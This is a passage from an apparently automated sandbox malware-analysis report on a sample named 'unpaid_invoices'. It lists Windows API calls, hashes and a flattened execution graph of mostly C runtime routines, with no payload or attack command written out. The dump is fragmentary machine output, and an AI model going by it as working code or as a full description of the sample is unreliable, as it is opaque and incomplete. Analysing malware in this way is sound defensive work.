              						_t27 = CharNextA(_t27);
              						continue;
              					}
              					L5:
              					return _t17;
              				}
              				_t17 = 0;
              				goto L5;
              			}










              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
              • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
              • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:7.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.4%
              Total number of Nodes:1642
              Total number of Limit Nodes:100
6298->6299 6300 e144f4 6299->6300 6301 e144dc 6299->6301 6310 e14515 __commit 6300->6310 6364 e148c1 6300->6364 6322 e11a85 6301->6322 6308 e14510 6312 e11cd3 __cftoe_l 58 API calls 6308->6312 6309 e1451f 6313 e1443f __lock 58 API calls 6309->6313 6310->6289 6312->6310 6314 e14526 6313->6314 6316 e14533 6314->6316 6317 e1454b 6314->6317 6318 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6316->6318 6319 e14841 _free 58 API calls 6317->6319 6320 e1453f 6318->6320 6319->6320 6370 e14567 6320->6370 6373 e13e98 6322->6373 6324 e11a8c 6325 e11a99 6324->6325 6326 e13e98 __NMSG_WRITE 58 API calls 6324->6326 6327 e11ae2 __NMSG_WRITE 58 API calls 6325->6327 6329 e11abb 6325->6329 6326->6325 6328 e11ab1 6327->6328 6330 e11ae2 __NMSG_WRITE 58 API calls 6328->6330 6331 e11ae2 6329->6331 6330->6329 6332 e11b00 __NMSG_WRITE 6331->6332 6334 e13e98 __NMSG_WRITE 55 API calls 6332->6334 6360 e11c27 6332->6360 6336 e11b13 6334->6336 6335 e11c90 6361 e117b8 6335->6361 6337 e11c2c GetStdHandle 6336->6337 6338 e13e98 __NMSG_WRITE 55 API calls 6336->6338 6341 e11c3a _strlen 6337->6341 6337->6360 6339 e11b24 6338->6339 6339->6337 6340 e11b36 6339->6340 6340->6360 6403 e15467 6340->6403 6344 e11c73 WriteFile 6341->6344 6341->6360 6344->6360 6345 e11b63 GetModuleFileNameW 6347 e11b83 6345->6347 6351 e11b93 __NMSG_WRITE 6345->6351 6346 e11c94 6348 e11ea9 __invoke_watson 8 API calls 6346->6348 6349 e15467 __NMSG_WRITE 55 API calls 6347->6349 6350 e11c9e 6348->6350 6349->6351 6351->6346 6356 e11bd9 6351->6356 6412 e154dc 6351->6412 6355 e153fb __NMSG_WRITE 55 API calls 6357 e11c10 6355->6357 6356->6346 6421 e153fb 6356->6421 6357->6346 6358 e11c17 6357->6358 6430 e1559a EncodePointer 6358->6430 6455 e15780 6360->6455 6470 e11784 GetModuleHandleExW 6361->6470 6367 e148cf 6364->6367 6366 e14509 6366->6308 6366->6309 6367->6366 6369 e148e2 6367->6369 6473 e11151 6367->6473 6369->6366 6369->6367 6490 e143b9 Sleep 6369->6490 6491 e145a9 LeaveCriticalSection 6370->6491 6372 e1456e 
6372->6310 6374 e13ea2 6373->6374 6375 e11cd3 __cftoe_l 58 API calls 6374->6375 6376 e13eac 6374->6376 6377 e13ec8 6375->6377 6376->6324 6380 e11e99 6377->6380 6383 e11e6e DecodePointer 6380->6383 6384 e11e81 6383->6384 6389 e11ea9 IsProcessorFeaturePresent 6384->6389 6387 e11e6e __cftoe_l 8 API calls 6388 e11ea5 6387->6388 6388->6324 6390 e11eb4 6389->6390 6395 e11d3c 6390->6395 6394 e11e98 6394->6387 6396 e11d56 _memset ___raise_securityfailure 6395->6396 6397 e11d76 IsDebuggerPresent 6396->6397 6398 e143dc ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6397->6398 6399 e11e3a ___raise_securityfailure 6398->6399 6400 e15780 __cftoe_l 6 API calls 6399->6400 6401 e11e5d 6400->6401 6402 e143c7 GetCurrentProcess TerminateProcess 6401->6402 6402->6394 6404 e15472 6403->6404 6405 e15480 6403->6405 6404->6405 6410 e15499 6404->6410 6406 e11cd3 __cftoe_l 58 API calls 6405->6406 6407 e1548a 6406->6407 6408 e11e99 __cftoe_l 9 API calls 6407->6408 6409 e11b56 6408->6409 6409->6345 6409->6346 6410->6409 6411 e11cd3 __cftoe_l 58 API calls 6410->6411 6411->6407 6413 e154ea 6412->6413 6415 e154f3 6413->6415 6417 e154ee 6413->6417 6419 e1552d 6413->6419 6414 e11cd3 __cftoe_l 58 API calls 6416 e1551e 6414->6416 6415->6356 6418 e11e99 __cftoe_l 9 API calls 6416->6418 6417->6414 6417->6415 6418->6415 6419->6415 6420 e11cd3 __cftoe_l 58 API calls 6419->6420 6420->6416 6422 e15415 6421->6422 6424 e15407 6421->6424 6423 e11cd3 __cftoe_l 58 API calls 6422->6423 6429 e1541f 6423->6429 6424->6422 6427 e15441 6424->6427 6425 e11e99 __cftoe_l 9 API calls 6426 e11bf9 6425->6426 6426->6346 6426->6355 6427->6426 6428 e11cd3 __cftoe_l 58 API calls 6427->6428 6428->6429 6429->6425 6431 e155ce ___crtIsPackagedApp 6430->6431 6432 e1568d IsDebuggerPresent 6431->6432 6433 e155dd LoadLibraryExW 6431->6433 6436 e156b2 6432->6436 6437 e15697 6432->6437 6434 e155f4 GetLastError 6433->6434 6435 e1561a GetProcAddress 6433->6435 6440 e15603 LoadLibraryExW 6434->6440 6445 
e156aa 6434->6445 6441 e1562e 7 API calls 6435->6441 6435->6445 6438 e156a5 6436->6438 6439 e156b7 DecodePointer 6436->6439 6437->6438 6442 e1569e OutputDebugStringW 6437->6442 6438->6445 6446 e156de DecodePointer DecodePointer 6438->6446 6453 e156f6 6438->6453 6439->6445 6440->6435 6440->6445 6443 e15676 GetProcAddress EncodePointer 6441->6443 6444 e1568a 6441->6444 6442->6438 6443->6444 6444->6432 6449 e15780 __cftoe_l 6 API calls 6445->6449 6446->6453 6447 e1571a DecodePointer 6447->6445 6448 e1572e DecodePointer 6448->6447 6450 e15735 6448->6450 6451 e1577c 6449->6451 6450->6447 6454 e15746 DecodePointer 6450->6454 6451->6360 6453->6447 6453->6448 6454->6447 6456 e15788 6455->6456 6457 e1578a IsProcessorFeaturePresent 6455->6457 6456->6335 6459 e17af6 6457->6459 6462 e17aa5 IsDebuggerPresent 6459->6462 6463 e17aba ___raise_securityfailure 6462->6463 6468 e143dc SetUnhandledExceptionFilter UnhandledExceptionFilter 6463->6468 6466 e17adf 6466->6335 6467 e17ac2 ___raise_securityfailure 6469 e143c7 GetCurrentProcess TerminateProcess 6467->6469 6468->6467 6469->6466 6471 e117af ExitProcess 6470->6471 6472 e1179d GetProcAddress 6470->6472 6472->6471 6474 e111cc 6473->6474 6485 e1115d 6473->6485 6475 e11751 _malloc DecodePointer 6474->6475 6476 e111d2 6475->6476 6477 e11cd3 __cftoe_l 57 API calls 6476->6477 6489 e111c4 6477->6489 6478 e11a85 __FF_MSGBANNER 57 API calls 6487 e11168 6478->6487 6479 e11190 RtlAllocateHeap 6479->6485 6479->6489 6480 e11ae2 __NMSG_WRITE 57 API calls 6480->6487 6481 e111b8 6483 e11cd3 __cftoe_l 57 API calls 6481->6483 6482 e11751 _malloc DecodePointer 6482->6485 6486 e111b6 6483->6486 6484 e117b8 __mtinitlocknum 3 API calls 6484->6487 6485->6479 6485->6481 6485->6482 6485->6486 6485->6487 6488 e11cd3 __cftoe_l 57 API calls 6486->6488 6487->6478 6487->6480 6487->6484 6487->6485 6488->6489 6489->6367 6490->6369 6491->6372 6492->6294 6493->6297 6497 e145a9 LeaveCriticalSection 6494->6497 6496 e13b6a 6496->6127 6497->6496 6499 e14955 
EncodePointer 6498->6499 6499->6499 6500 e1496f 6499->6500 6500->6166 6504 e14730 6501->6504 6503 e14837 6503->6168 6505 e1473c __commit 6504->6505 6512 e11930 6505->6512 6511 e14763 __commit 6511->6503 6513 e1443f __lock 58 API calls 6512->6513 6514 e11937 6513->6514 6515 e14774 DecodePointer DecodePointer 6514->6515 6516 e147a1 6515->6516 6517 e14751 6515->6517 6516->6517 6529 e17431 6516->6529 6526 e1476e 6517->6526 6519 e14804 EncodePointer EncodePointer 6519->6517 6520 e147b3 6520->6519 6521 e147d8 6520->6521 6536 e14908 6520->6536 6521->6517 6523 e14908 __realloc_crt 61 API calls 6521->6523 6525 e147f2 EncodePointer 6521->6525 6524 e147ec 6523->6524 6524->6517 6524->6525 6525->6519 6563 e11939 6526->6563 6530 e1743a 6529->6530 6531 e1744f HeapSize 6529->6531 6532 e11cd3 __cftoe_l 58 API calls 6530->6532 6531->6520 6533 e1743f 6532->6533 6534 e11e99 __cftoe_l 9 API calls 6533->6534 6535 e1744a 6534->6535 6535->6520 6538 e1490f 6536->6538 6539 e1494c 6538->6539 6541 e17462 6538->6541 6562 e143b9 Sleep 6538->6562 6539->6521 6542 e17476 6541->6542 6543 e1746b 6541->6543 6545 e1747e 6542->6545 6551 e1748b 6542->6551 6544 e11151 _malloc 58 API calls 6543->6544 6546 e17473 6544->6546 6547 e14841 _free 58 API calls 6545->6547 6546->6538 6561 e17486 __dosmaperr 6547->6561 6548 e174c3 6550 e11751 _malloc DecodePointer 6548->6550 6549 e17493 HeapReAlloc 6549->6551 6549->6561 6552 e174c9 6550->6552 6551->6548 6551->6549 6553 e174f3 6551->6553 6555 e11751 _malloc DecodePointer 6551->6555 6558 e174db 6551->6558 6554 e11cd3 __cftoe_l 58 API calls 6552->6554 6556 e11cd3 __cftoe_l 58 API calls 6553->6556 6554->6561 6555->6551 6557 e174f8 GetLastError 6556->6557 6557->6561 6559 e11cd3 __cftoe_l 58 API calls 6558->6559 6560 e174e0 GetLastError 6559->6560 6560->6561 6561->6538 6562->6538 6566 e145a9 LeaveCriticalSection 6563->6566 6565 e11940 6565->6511 6566->6565 6573 e111f8 6567->6573 6569 e11025 VirtualAlloc 6570 e11487 6569->6570 7089 e114a2 6570->7089 6572 e1149d 6572->6175 
6575 e11204 __commit 6573->6575 6574 e11217 6576 e11cd3 __cftoe_l 58 API calls 6574->6576 6575->6574 6577 e11248 6575->6577 6578 e1121c 6576->6578 6592 e12044 6577->6592 6580 e11e99 __cftoe_l 9 API calls 6578->6580 6587 e11227 __commit @_EH4_CallFilterFunc@8 6580->6587 6581 e1124d 6582 e11263 6581->6582 6583 e11256 6581->6583 6585 e1128d 6582->6585 6586 e1126d 6582->6586 6584 e11cd3 __cftoe_l 58 API calls 6583->6584 6584->6587 6607 e12163 6585->6607 6588 e11cd3 __cftoe_l 58 API calls 6586->6588 6587->6569 6588->6587 6593 e12050 __commit 6592->6593 6594 e1443f __lock 58 API calls 6593->6594 6595 e1205e 6594->6595 6596 e120d9 6595->6596 6601 e144c7 __mtinitlocknum 58 API calls 6595->6601 6605 e120d2 6595->6605 6628 e11fad 6595->6628 6633 e12017 6595->6633 6597 e148c1 __malloc_crt 58 API calls 6596->6597 6599 e120e0 6597->6599 6600 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6599->6600 6599->6605 6604 e12106 EnterCriticalSection 6600->6604 6601->6595 6603 e1214f __commit 6603->6581 6604->6605 6625 e1215a 6605->6625 6615 e12183 __wopenfile 6607->6615 6608 e1219d 6609 e11cd3 __cftoe_l 58 API calls 6608->6609 6610 e121a2 6609->6610 6611 e11e99 __cftoe_l 9 API calls 6610->6611 6613 e11298 6611->6613 6612 e123bb 6640 e1626f 6612->6640 6622 e112ba 6613->6622 6615->6608 6621 e12358 6615->6621 6643 e162c3 6615->6643 6618 e162c3 __wcsnicmp 60 API calls 6619 e12370 6618->6619 6620 e162c3 __wcsnicmp 60 API calls 6619->6620 6619->6621 6620->6621 6621->6608 6621->6612 7082 e11fdd 6622->7082 6624 e112c0 6624->6587 6638 e145a9 LeaveCriticalSection 6625->6638 6627 e12161 6627->6603 6629 e11fb8 6628->6629 6630 e11fce EnterCriticalSection 6628->6630 6631 e1443f __lock 58 API calls 6629->6631 6630->6595 6632 e11fc1 6631->6632 6632->6595 6634 e12025 6633->6634 6635 e12038 LeaveCriticalSection 6633->6635 6639 e145a9 LeaveCriticalSection 6634->6639 6635->6595 6637 e12035 6637->6595 6638->6627 6639->6637 6651 e15a53 6640->6651 6642 e16288 6642->6613 6644 e16361 6643->6644 
6645 e162d5 6643->6645 6994 e16379 6644->6994 6647 e11cd3 __cftoe_l 58 API calls 6645->6647 6649 e12351 6645->6649 6648 e162ee 6647->6648 6650 e11e99 __cftoe_l 9 API calls 6648->6650 6649->6618 6649->6621 6650->6649 6654 e15a5f __commit 6651->6654 6652 e15a75 6653 e11cd3 __cftoe_l 58 API calls 6652->6653 6655 e15a7a 6653->6655 6654->6652 6656 e15aab 6654->6656 6657 e11e99 __cftoe_l 9 API calls 6655->6657 6662 e15b1c 6656->6662 6661 e15a84 __commit 6657->6661 6659 e15ac7 6736 e15af0 6659->6736 6661->6642 6663 e15b3c 6662->6663 6740 e18a29 6663->6740 6665 e11ea9 __invoke_watson 8 API calls 6666 e1626e 6665->6666 6669 e15a53 __wsopen_helper 103 API calls 6666->6669 6667 e15b58 6668 e15b92 6667->6668 6678 e15bb5 6667->6678 6711 e15c8f 6667->6711 6771 e11c9f 6668->6771 6671 e16288 6669->6671 6671->6659 6673 e11cd3 __cftoe_l 58 API calls 6674 e15ba4 6673->6674 6676 e11e99 __cftoe_l 9 API calls 6674->6676 6675 e15c73 6677 e11c9f __commit 58 API calls 6675->6677 6703 e15bae 6676->6703 6679 e15c78 6677->6679 6678->6675 6683 e15c51 6678->6683 6680 e11cd3 __cftoe_l 58 API calls 6679->6680 6681 e15c85 6680->6681 6682 e11e99 __cftoe_l 9 API calls 6681->6682 6682->6711 6747 e16d26 6683->6747 6685 e15d1f 6686 e15d29 6685->6686 6687 e15d4c 6685->6687 6688 e11c9f __commit 58 API calls 6686->6688 6765 e159cb 6687->6765 6691 e15d2e 6688->6691 6693 e11cd3 __cftoe_l 58 API calls 6691->6693 6692 e15dec GetFileType 6696 e15df7 GetLastError 6692->6696 6697 e15e39 6692->6697 6695 e15d38 6693->6695 6694 e15dba GetLastError 6774 e11cb2 6694->6774 6699 e11cd3 __cftoe_l 58 API calls 6695->6699 6700 e11cb2 __dosmaperr 58 API calls 6696->6700 6779 e16fbc 6697->6779 6699->6703 6704 e15e1e CloseHandle 6700->6704 6701 e159cb ___createFile 3 API calls 6706 e15daf 6701->6706 6702 e15ddf 6709 e11cd3 __cftoe_l 58 API calls 6702->6709 6703->6659 6704->6702 6705 e15e2c 6704->6705 6708 e11cd3 __cftoe_l 58 API calls 6705->6708 6706->6692 6706->6694 6710 e15e31 6708->6710 6709->6711 6710->6702 6711->6665 
6712 e16012 6712->6711 6715 e161e5 CloseHandle 6712->6715 6717 e159cb ___createFile 3 API calls 6715->6717 6720 e1620c 6717->6720 6718 e11c9f __commit 58 API calls 6732 e15ed8 6718->6732 6719 e12a3a 70 API calls __read_nolock 6719->6732 6721 e16214 GetLastError 6720->6721 6722 e1609c 6720->6722 6723 e11cb2 __dosmaperr 58 API calls 6721->6723 6722->6711 6724 e16220 6723->6724 6871 e16ecf 6724->6871 6726 e15ee0 6726->6732 6797 e1898f 6726->6797 6812 e186fe 6726->6812 6730 e1608f 6733 e1898f __close_nolock 61 API calls 6730->6733 6731 e17064 60 API calls __lseeki64_nolock 6731->6732 6732->6712 6732->6719 6732->6726 6732->6730 6732->6731 6843 e17da9 6732->6843 6734 e16096 6733->6734 6735 e11cd3 __cftoe_l 58 API calls 6734->6735 6735->6722 6737 e15af6 6736->6737 6738 e15b1a 6736->6738 6993 e1703e LeaveCriticalSection 6737->6993 6738->6661 6741 e18a33 6740->6741 6742 e18a48 6740->6742 6743 e11cd3 __cftoe_l 58 API calls 6741->6743 6742->6667 6744 e18a38 6743->6744 6745 e11e99 __cftoe_l 9 API calls 6744->6745 6746 e18a43 6745->6746 6746->6667 6748 e16d32 __commit 6747->6748 6749 e144c7 __mtinitlocknum 58 API calls 6748->6749 6750 e16d43 6749->6750 6751 e1443f __lock 58 API calls 6750->6751 6752 e16d48 __commit 6750->6752 6761 e16d56 6751->6761 6752->6685 6753 e16ea4 6892 e16ec6 6753->6892 6755 e16e36 6756 e14879 __calloc_crt 58 API calls 6755->6756 6760 e16e3f 6756->6760 6757 e1443f __lock 58 API calls 6757->6761 6758 e16dd6 EnterCriticalSection 6759 e16de6 LeaveCriticalSection 6758->6759 6758->6761 6759->6761 6760->6753 6883 e16c98 6760->6883 6761->6753 6761->6755 6761->6757 6761->6758 6763 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6761->6763 6880 e16dfe 6761->6880 6763->6761 6766 e159d6 ___crtIsPackagedApp 6765->6766 6767 e15a31 CreateFileW 6766->6767 6768 e159da GetModuleHandleW GetProcAddress 6766->6768 6770 e15a4f 6767->6770 6769 e159f7 6768->6769 6769->6770 6770->6692 6770->6694 6770->6701 6772 e13703 __getptd_noexit 58 API calls 6771->6772 6773 
e11ca4 6772->6773 6773->6673 6775 e11c9f __commit 58 API calls 6774->6775 6776 e11cbb __dosmaperr 6775->6776 6777 e11cd3 __cftoe_l 58 API calls 6776->6777 6778 e11cce 6777->6778 6778->6702 6780 e17024 6779->6780 6781 e16fc8 6779->6781 6782 e11cd3 __cftoe_l 58 API calls 6780->6782 6781->6780 6786 e16fea 6781->6786 6783 e17029 6782->6783 6785 e11c9f __commit 58 API calls 6783->6785 6784 e15e57 6784->6712 6784->6732 6788 e17064 6784->6788 6785->6784 6786->6784 6787 e1700f SetStdHandle 6786->6787 6787->6784 6900 e16f55 6788->6900 6790 e17074 6791 e1708d SetFilePointerEx 6790->6791 6792 e1707c 6790->6792 6794 e170a5 GetLastError 6791->6794 6796 e15ec1 6791->6796 6793 e11cd3 __cftoe_l 58 API calls 6792->6793 6793->6796 6795 e11cb2 __dosmaperr 58 API calls 6794->6795 6795->6796 6796->6718 6796->6732 6798 e16f55 __commit 58 API calls 6797->6798 6800 e1899d 6798->6800 6799 e189f3 6802 e16ecf __free_osfhnd 59 API calls 6799->6802 6800->6799 6801 e189d1 6800->6801 6803 e16f55 __commit 58 API calls 6800->6803 6801->6799 6804 e16f55 __commit 58 API calls 6801->6804 6805 e189fb 6802->6805 6807 e189c8 6803->6807 6808 e189dd CloseHandle 6804->6808 6806 e18a1d 6805->6806 6809 e11cb2 __dosmaperr 58 API calls 6805->6809 6806->6726 6810 e16f55 __commit 58 API calls 6807->6810 6808->6799 6811 e189e9 GetLastError 6808->6811 6809->6806 6810->6801 6811->6799 6813 e17064 __lseeki64_nolock 60 API calls 6812->6813 6814 e1871b 6813->6814 6815 e18780 6814->6815 6817 e17064 __lseeki64_nolock 60 API calls 6814->6817 6816 e11cd3 __cftoe_l 58 API calls 6815->6816 6818 e1878b 6815->6818 6816->6818 6821 e18737 6817->6821 6818->6726 6819 e1881f 6824 e17064 __lseeki64_nolock 60 API calls 6819->6824 6840 e18885 6819->6840 6820 e18760 GetProcessHeap HeapAlloc 6822 e1877b 6820->6822 6829 e18794 __setmode_nolock 6820->6829 6821->6815 6821->6819 6821->6820 6825 e11cd3 __cftoe_l 58 API calls 6822->6825 6823 e17064 __lseeki64_nolock 60 API calls 6823->6815 6826 e18837 6824->6826 6825->6815 6826->6815 6827 
e16f55 __commit 58 API calls 6826->6827 6828 e1884b SetEndOfFile 6827->6828 6830 e1886b 6828->6830 6828->6840 6833 e187e5 6829->6833 6835 e187f4 __setmode_nolock 6829->6835 6913 e17e99 6829->6913 6832 e11cd3 __cftoe_l 58 API calls 6830->6832 6834 e18870 6832->6834 6836 e11c9f __commit 58 API calls 6833->6836 6837 e11c9f __commit 58 API calls 6834->6837 6841 e18809 GetProcessHeap HeapFree 6835->6841 6838 e187ea 6836->6838 6839 e1887b GetLastError 6837->6839 6838->6835 6842 e11cd3 __cftoe_l 58 API calls 6838->6842 6839->6840 6840->6815 6840->6823 6841->6840 6842->6835 6844 e17db5 __commit 6843->6844 6845 e17dc2 6844->6845 6846 e17dd9 6844->6846 6847 e11c9f __commit 58 API calls 6845->6847 6848 e17e78 6846->6848 6850 e17ded 6846->6850 6849 e17dc7 6847->6849 6851 e11c9f __commit 58 API calls 6848->6851 6852 e11cd3 __cftoe_l 58 API calls 6849->6852 6853 e17e15 6850->6853 6854 e17e0b 6850->6854 6855 e17e10 6851->6855 6865 e17dce __commit 6852->6865 6857 e16c98 ___lock_fhandle 59 API calls 6853->6857 6856 e11c9f __commit 58 API calls 6854->6856 6859 e11cd3 __cftoe_l 58 API calls 6855->6859 6856->6855 6858 e17e1b 6857->6858 6860 e17e41 6858->6860 6861 e17e2e 6858->6861 6862 e17e84 6859->6862 6866 e11cd3 __cftoe_l 58 API calls 6860->6866 6863 e17e99 __write_nolock 76 API calls 6861->6863 6864 e11e99 __cftoe_l 9 API calls 6862->6864 6867 e17e3a 6863->6867 6864->6865 6865->6732 6868 e17e46 6866->6868 6989 e17e70 6867->6989 6869 e11c9f __commit 58 API calls 6868->6869 6869->6867 6872 e16f3b 6871->6872 6873 e16edb 6871->6873 6874 e11cd3 __cftoe_l 58 API calls 6872->6874 6873->6872 6879 e16f04 6873->6879 6875 e16f40 6874->6875 6876 e11c9f __commit 58 API calls 6875->6876 6877 e16f2c 6876->6877 6877->6722 6878 e16f26 SetStdHandle 6878->6877 6879->6877 6879->6878 6895 e145a9 LeaveCriticalSection 6880->6895 6882 e16e05 6882->6761 6884 e16ca4 __commit 6883->6884 6885 e16cf3 EnterCriticalSection 6884->6885 6886 e1443f __lock 58 API calls 6884->6886 6887 e16d19 __commit 6885->6887 
6888 e16cc9 6886->6888 6887->6753 6889 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6888->6889 6891 e16ce1 6888->6891 6889->6891 6896 e16d1d 6891->6896 6899 e145a9 LeaveCriticalSection 6892->6899 6894 e16ecd 6894->6752 6895->6882 6897 e145a9 _doexit LeaveCriticalSection 6896->6897 6898 e16d24 6897->6898 6898->6885 6899->6894 6901 e16f60 6900->6901 6902 e16f75 6900->6902 6903 e11c9f __commit 58 API calls 6901->6903 6905 e11c9f __commit 58 API calls 6902->6905 6907 e16f9a 6902->6907 6904 e16f65 6903->6904 6906 e11cd3 __cftoe_l 58 API calls 6904->6906 6908 e16fa4 6905->6908 6909 e16f6d 6906->6909 6907->6790 6910 e11cd3 __cftoe_l 58 API calls 6908->6910 6909->6790 6911 e16fac 6910->6911 6912 e11e99 __cftoe_l 9 API calls 6911->6912 6912->6909 6914 e17ea6 __write_nolock 6913->6914 6915 e17ee5 6914->6915 6916 e17f04 6914->6916 6947 e17eda 6914->6947 6918 e11c9f __commit 58 API calls 6915->6918 6919 e17f40 6916->6919 6920 e17f5c 6916->6920 6917 e15780 __cftoe_l 6 API calls 6921 e186fa 6917->6921 6922 e17eea 6918->6922 6923 e11c9f __commit 58 API calls 6919->6923 6925 e17f75 6920->6925 6928 e17064 __lseeki64_nolock 60 API calls 6920->6928 6921->6829 6924 e11cd3 __cftoe_l 58 API calls 6922->6924 6926 e17f45 6923->6926 6927 e17ef1 6924->6927 6972 e16c44 6925->6972 6930 e11cd3 __cftoe_l 58 API calls 6926->6930 6931 e11e99 __cftoe_l 9 API calls 6927->6931 6928->6925 6933 e17f4c 6930->6933 6931->6947 6932 e17f83 6934 e182dc 6932->6934 6981 e136eb 6932->6981 6937 e11e99 __cftoe_l 9 API calls 6933->6937 6935 e182fa 6934->6935 6936 e1866f WriteFile 6934->6936 6939 e1841e 6935->6939 6945 e18310 6935->6945 6940 e182cf GetLastError 6936->6940 6949 e1829c 6936->6949 6937->6947 6951 e18429 6939->6951 6965 e18513 6939->6965 6940->6949 6942 e186a8 6942->6947 6948 e11cd3 __cftoe_l 58 API calls 6942->6948 6943 e17fee 6943->6934 6944 e17ffe GetConsoleCP 6943->6944 6944->6942 6967 e1802d 6944->6967 6945->6942 6946 e1837f WriteFile 6945->6946 6945->6949 6946->6940 6946->6945 
6947->6917 6952 e186d6 6948->6952 6949->6942 6949->6947 6950 e183fc 6949->6950 6953 e18407 6950->6953 6954 e1869f 6950->6954 6951->6942 6951->6949 6956 e1848e WriteFile 6951->6956 6957 e11c9f __commit 58 API calls 6952->6957 6958 e11cd3 __cftoe_l 58 API calls 6953->6958 6959 e11cb2 __dosmaperr 58 API calls 6954->6959 6955 e18588 WideCharToMultiByte 6955->6940 6955->6965 6956->6940 6956->6951 6957->6947 6960 e1840c 6958->6960 6959->6947 6962 e11c9f __commit 58 API calls 6960->6962 6961 e185d7 WriteFile 6964 e1862a GetLastError 6961->6964 6961->6965 6962->6947 6964->6965 6965->6942 6965->6949 6965->6955 6965->6961 6966 e192cb 60 API calls __write_nolock 6966->6967 6967->6940 6967->6949 6967->6966 6968 e18116 WideCharToMultiByte 6967->6968 6970 e192e3 WriteConsoleW CreateFileW __putwch_nolock 6967->6970 6971 e181ab WriteFile 6967->6971 6986 e191c5 6967->6986 6968->6949 6969 e18151 WriteFile 6968->6969 6969->6940 6969->6967 6970->6967 6971->6940 6971->6967 6973 e16c5c 6972->6973 6974 e16c4f 6972->6974 6976 e16c68 6973->6976 6977 e11cd3 __cftoe_l 58 API calls 6973->6977 6975 e11cd3 __cftoe_l 58 API calls 6974->6975 6978 e16c54 6975->6978 6976->6932 6979 e16c89 6977->6979 6978->6932 6980 e11e99 __cftoe_l 9 API calls 6979->6980 6980->6978 6982 e13703 __getptd_noexit 58 API calls 6981->6982 6983 e136f1 6982->6983 6984 e136fe GetConsoleMode 6983->6984 6985 e117ce __lock 58 API calls 6983->6985 6984->6934 6984->6943 6985->6984 6987 e1918b __isleadbyte_l 58 API calls 6986->6987 6988 e191d2 6987->6988 6988->6967 6992 e1703e LeaveCriticalSection 6989->6992 6991 e17e76 6991->6865 6992->6991 6993->6738 6995 e1638d 6994->6995 7003 e163a4 6994->7003 6996 e16394 6995->6996 6998 e163b5 6995->6998 6997 e11cd3 __cftoe_l 58 API calls 6996->6997 6999 e16399 6997->6999 7005 e14c0c 6998->7005 7001 e11e99 __cftoe_l 9 API calls 6999->7001 7001->7003 7002 e18b20 60 API calls __towlower_l 7004 e163c0 7002->7004 7003->6649 7004->7002 7004->7003 7006 e14c6a 7005->7006 7007 e14c1d 7005->7007 
7006->7004 7008 e136eb __setmbcp 58 API calls 7007->7008 7009 e14c23 7008->7009 7010 e14c4a 7009->7010 7013 e17366 7009->7013 7010->7006 7028 e14f2d 7010->7028 7014 e17372 __commit 7013->7014 7015 e136eb __setmbcp 58 API calls 7014->7015 7016 e1737b 7015->7016 7017 e173aa 7016->7017 7018 e1738e 7016->7018 7019 e1443f __lock 58 API calls 7017->7019 7021 e136eb __setmbcp 58 API calls 7018->7021 7020 e173b1 7019->7020 7040 e173e6 7020->7040 7023 e17393 7021->7023 7026 e173a1 __commit 7023->7026 7027 e117ce __lock 58 API calls 7023->7027 7026->7010 7027->7026 7029 e14f39 __commit 7028->7029 7030 e136eb __setmbcp 58 API calls 7029->7030 7031 e14f43 7030->7031 7032 e1443f __lock 58 API calls 7031->7032 7033 e14f55 7031->7033 7038 e14f73 7032->7038 7034 e14f63 __commit 7033->7034 7036 e117ce __lock 58 API calls 7033->7036 7034->7006 7035 e14fa0 7078 e14fca 7035->7078 7036->7034 7038->7035 7039 e14841 _free 58 API calls 7038->7039 7039->7035 7041 e173f1 ___addlocaleref ___removelocaleref 7040->7041 7043 e173c5 7040->7043 7041->7043 7047 e1716c 7041->7047 7044 e173dd 7043->7044 7077 e145a9 LeaveCriticalSection 7044->7077 7046 e173e4 7046->7023 7048 e171e5 7047->7048 7055 e17181 7047->7055 7049 e17232 7048->7049 7050 e14841 _free 58 API calls 7048->7050 7051 e18d86 ___free_lc_time 58 API calls 7049->7051 7062 e1725b 7049->7062 7053 e17206 7050->7053 7054 e17250 7051->7054 7052 e171b2 7056 e171d0 7052->7056 7067 e14841 _free 58 API calls 7052->7067 7057 e14841 _free 58 API calls 7053->7057 7058 e14841 _free 58 API calls 7054->7058 7055->7048 7055->7052 7059 e14841 _free 58 API calls 7055->7059 7063 e14841 _free 58 API calls 7056->7063 7061 e17219 7057->7061 7058->7062 7065 e171a7 7059->7065 7060 e172ba 7066 e14841 _free 58 API calls 7060->7066 7068 e14841 _free 58 API calls 7061->7068 7062->7060 7076 e14841 58 API calls _free 7062->7076 7064 e171da 7063->7064 7069 e14841 _free 58 API calls 7064->7069 7070 e18c23 ___free_lconv_mon 58 API calls 7065->7070 7071 e172c0 7066->7071 
